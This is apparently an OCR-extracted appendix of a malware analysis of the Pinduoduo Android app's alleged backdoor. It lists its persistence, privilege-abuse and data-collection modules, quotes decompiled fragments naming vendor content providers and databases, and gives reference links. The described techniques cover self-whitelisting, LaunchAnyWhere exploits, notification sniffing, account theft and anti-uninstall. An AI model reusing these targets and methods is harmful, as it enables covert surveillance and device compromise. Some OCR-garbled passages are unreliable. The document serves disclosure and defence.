ComponentName("com.miui.voiceassist", 
"com.tencent.connect.common.AssistActivity")); 
intent2.addFlags(-2122297344) ; 
ddLaw(transitByTencent(intent2, ahriConfig)); 


private boolean hasCollected() { 


return 
MMKVCompat .module("LVUA.XmVoiceAssistantUsageCollector", 
false).getLong("last_success_collect_time", ©) ! = 0; } 


ApolloStrategy: get process information and kill the target process; when 
the screen is closed 

DancerStrategy: start any intent using vulnerability; MIUI10 or higher 
ViStrategy: configure to get permissions. 

PurgeV2Strategy: start LaunchAnyWhere and Parcel Mismatch EXP 
GhostStrategy: lock screen related 

DirgeStrategy: change LockDisplay; oppo 

SionStartDetectStrategy : configure some capability items 


String expKey = 
"ny induoduo_Android.ab_keep_alive_strategy_sion_detect_63500_exp"; 

List abilityNames = Arrays.asList("DirectSubAbility", 
"RumbleSubAbility", "FloatSubAbility", "RyzeSubAbility", 
"NotificationSubAbility", " AlarmSubAbility"); 

DarchrowStrategy: Add itself to whitelist on Xiaomi 
StrutsStrategy: Create various payload requests for messages based on 
dynamic config 
WinterStrategy: findprovider by action on Xiaomi 
getAuthorityByAction("miui.intent.action.SETTINGS SEARCH_PROVIDER", 
"com.xiaomi.vipaccount"); 
JannaVictimStrategy: get process information;plugin update 
JessieStrategy: process management, kill other processes 
MedusaStrategy: Self-start 
FioraStrategy: collect device related information, phone, system, gobal 
information, and according to the configuration, try to execute the methods 
in the configuration. 
ZiggsStrategy:double-open detection. 
ZyraDetectStrategy:detect the existence of files according to the 
configuration; 
FakerStrategy:create a fake screen display; 
SkyCastleStrategy:work with FackerStrategy to create a fake screen display 
on Vivo 
FizzStrategy:find the existence of a file, add or modify it 
PermissionClosedStrategy:Oppo Rom's detector 
GlassStrategy: detect service status; Xiaomi 
com.miui.securitycore", 

"com.miui.enterprise.service.EntInstaLlService" 
BannerDetectStrategy :banner ad detection and display; oppo, vivo 
NunuStrategy: "registerAppUsageObserver" capability call; 
SdThousandAbilityRequest sdThousandAbilityRequest = new 
SdThousandAbilityRequest("registerAppUsageObserver", buildSdRequest ); 
ButterStrategy:add itself to whitelist by writing to key configuration 
file; rewriteByShell 
MiranaStrategy: LauncherDetect 
ZedDetectStrategy:manipulate the database of vivo;/databases/afsecure.db 
CanvasStrategy:Get reboot time;refreshed power consumption status? 
WindStrategy : find providers 
NotificationClosedDetectStrategy: detect notification bar 
NotificationClosedDetectStrategyV2 :Same function as above one 
VanishingArtStrategy :Hide or remove some cache; removeUnusedCache 
LeBlancStrategy : send notifications; oppo 

Intent intent = new 
Intent("oppo.safecenter.intent.action.CHANGE_NOTIFICATION_STATE"); 

intent.setComponent (new ComponentName("com.coloros.notificationmanager", 
"com.coLloros.notificationmanager.receiver.StatictisReceiver ")); 
AniviaStrategy: a database operation on VIVO to add itself to whitelist 
"content://com.vivo.assistant.upgrade/") + 
getVpPath("data/user_de/%d/com. vivo.abe/databases/BehaviorEngine.db" ) 
MaoKaiStrategy:clearActivityTasketc ; Huawei 

"com.huawei.ohos.famanager", 
"com.huawei.abilitygallery.ui.FormManagerActivity") ); 

KnightStrategy: exploit startBgActivityByThemeManager; startActivtyByNewHome 
Xiaomi 


KnightV2Strategy : roughly the same function, the second version 
TuskStrategy:prevent from being cleaned up; vivo 
content://com.android.settings.fileprovider/root_files/data/user_de/%d/com. 
vivo.upslide/databases/speedup.db 

ZeusStrategy:Huawei corner state change; callSetUnreadState 
content://com.hihonor.android. launcher .settings/badge 
WeatherSummaryStrategy :open activity by hijacking weather service 
MaginaStrategy:Huawei app market related utilization 
com.huawei.appmarket", 
"com.huawei.appmarket.service.externalapi.view. ThirdApiActivity 
MagnusStrategy: Hijack Notification bar on Oppo 

getOppoC LeanPageActivityComp; 
com.heytap.cdo.client.search.notification.SearchNotificationReceiver 
LuluStrategy: self-starting, etc.. 
"content://com.coLloros.safecenter.security.InterfaceProvider"); 
"content://com.opLlus.safecenter.security.InterfaceProvider" 
TinyStrategy:Hijack notification of battery status 
content://com.android.settings.files/my_root/data/user_de/%d/%s/databases/s 
martpowerprovider.db" 

BoushStrategyV2:change state after self-start;MIUI12 or above 
ClinkStrategy: write key configuration files on OPPO appmarket 
content://com.bbk.appstore.upgrade/data/data/com.bbk.appstore/files/mmkv/co 
m.bbk.appstore_push_config 

NamiV2Strategy: collect various user data, monitor and report on the usage 
of other apps 

BrandStrategy:Download files when the screen is turned off 
JoaquimStrategy:Query this database to get all apps' power consumption 
information 

data/data/com.vivo.abe/databases/BehaviorEngine.db 

SivirStrategy: Hide icons of itself, etc; 

ZetStrategy :Titan wakeup, etc; 

SpringStrategy: background execution, add hover windows, etc; 


Analysis of the dynamically downloaded dexs are as follows, there're also 
some other analysis on the web: 
https://mp.weixin.qq.com/s/kiLvnJSDZpYRHI_XiUx9gg 


com.google.android.sd.biz_dynamic_dex.app_usage_observer .AppUsageObserver .d 
ex: Implementation of the AppUsageObserver in NuNuStrategy; discover App 
usage 
com.google.android.sd.biz_dynamic_dex.check_aster.CheckAsterExecutor.dex: 
similar functionality to the previous one, both have installApkChecker 
class 
com.google.android.sd.biz_dynamic_dex.get_account_extra.GetAccountExtraExec 
utor.dex: GetAccount , Vivo System Backup Storage, etc; 
com.google.android.sd.biz_dynamic_dex.get_accounts.GetAccountsExecutor.dex: 
GetAccounts; 
com.google.android.sd.biz_dynamic_dex.get_history_ntf_path.GetHistoryNtfPat 
hExecutor.dex:Get all apps' history notifications 
com.google.android.sd.biz_dynamic_dex.get_icon_info.GetIconInfoExecutor .dex 
Get Icons; xXiaomi, vivo, huawei; 
content: //com.miui.home. Launcher.settings/favorites"); 
if(TextUtils.equals(a.a(), "vivo")) { 
return 


Uri.parse("content://com.bbk. lLauncher2.settings/favorites") ; 


} 


return TextUtils.equals(a.a(), 


"huawei") ? 


Uri.parse("content://com.huawei.android. launcher.settings/favorites") 


nude: 
} 


com.google.android.sd.biz_dynamic_dex. 


get_icon; 


com.google.android.sd.biz_dynamic_dex. 


wei phone related command execution 


com.google.android.sd.biz_dynamic_dex. 


nput file, via backup file? 
.c Lient_slog_cache 


com.google.android.sd.biz_dynamic_dex. 


xecutor.dex: Hide power usage data on 


com.google.android.sd.biz_dynamic_dex. 


onListenerExecutor.dex: Listen to the 


com.google.android.sd.biz_dynamic_dex. 


get_icon_info.GetIconInfoExecutor .dex 
hw_file_cmd.HwFileCmdExecutor .dex:Hua 


hw_get_input .HwGetInputExecutor.dex:I 


hw_hide_power_window. HidePowerWindowE 
Huawei phones 
hw_notification_listener.HwWNotificati 
notification bar; huawei 
hw_permission.HwPermissionExecutor1.d 


ex:Action to change the content of the notification bar;honor 
com.google.android.sd.biz_dynamic_dex.hw_power_update.HwPowerUpdateExecutor 
.dex: Modify Huawei phones' power stats 
com.google.android.sd.biz_dynamic_dex.hw_self_start.HwSelfStartExecutor .dex 
:self_start;get_private sharedpreference etc.; huawei 
com.google.android.sd.biz_dynamic_dex.hw_widget . HwAddwidgetExecutor .dex:add 
widget ; huawei 

com.google.android.sd.biz_dynamic_dex. Logcat.LogcatExecutor.dex:Get system 
Log 
com.google.android.sd.biz_dynamic_dex.notification_lListener .NotificationLis 
tenerExecutor.dex: Listening to the notification bar and sniff 
notifications 
com.google.android.sd.biz_dynamic_dex.oppo_boot_perm.OppoBootPermExecutor.d 
ex: Attack content://com.coloros.safecenter.security.InterfaceProvider, 
content://com.oplus.safecenter.security.InterfaceProvider to modify startup 
parameters; oppo, oneplus 
com.google.android.sd.biz_dynamic_dex.oppo_community_id.OppoCommunityIdExec 
utor.dex: steal com. oppo.community related account 

information; /shared_prefs/CurrentLoginUserUid.xml Oppo 
com.google.android.sd.biz_dynamic_dex.oppo_get_input.OppoGetInputExecutor.d 
ex: input file, patch apk, etc.; oppo 
com.google.android.sd.biz_dynamic_dex.oppo_get_loc.OppoGetLocExecutor.dex:g 
et_Loc; oppo 
com.google.android.sd.biz_dynamic_dex.oppo_get_settings_username.GetSetting 
sUsernameExecutor .dex:GetSettingsUsername 
com.google.android.sd.biz_dynamic_dex.oppo_infect_dynamic.OppoInfectExecuto 
r.dex: the relevant utilization of the fast application platform 
application. Oppo com.nearme.instant.platform. 
com.google.android.sd.biz_dynamic_dex.oppo_notification_ut.OppoNotification 
UTExecutor.dex: Notification bar related interface ; 
OppoNotificationExecutor.dex:Change notification bar state 
OppoPermissionExecutor.dex: add widget, permission, etc.; Oppo 
com.google.android.sd.biz_dynamic_dex.oppoaddwidget .OppoAddwidgetExecutor.d 
ex: addwidget ; oppo 
com.google.android.sd.biz_dynamic_dex.oppoau.OppoAUExecutor .dex:Anti- 


uninstalL; Oppo 
com.google.android.sd.biz_dynamic_dex.oppoopm.OppoPMExecutor.dex oppo 
operation lock screen 
com.google.android.sd.biz_dynamic_dex.query_Lbs_info.QueryLBSInfoExecutor.d 
ex: Location information 
com.google.android.sd.biz_dynamic_dex.reset_log.ResetLogExecutor.dex: Clear 
Llogcat Log 

RubickCmdExecutor.dex: Execute command (set sid, return pid, etc.) 


Appendix Ill: Reference Links 


e https://www.v2ex.com/t/851215 

e https://mp.weixin.qg.com/s/P_EYQxOEupqdU0BJMRqwsw 

e https://github.com/davinci1010/pinduoduo_backdoor 

e https://github.com/recorder1013/pinduoduo_backdoor_recorder 
e https://github.com/davinci1012/pinduoduo_backdoor_unpacker 


